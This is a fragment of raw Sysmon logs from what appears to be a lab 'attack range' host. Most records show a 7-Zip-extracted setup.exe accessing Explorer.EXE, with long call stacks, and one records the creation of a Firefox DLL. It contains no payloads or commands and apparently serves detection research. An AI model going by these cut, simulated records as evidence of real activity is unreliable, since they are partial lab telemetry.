dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\mozavcodec.dll2021-01-18 13:59:52.411 10341000x800000000000000015058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
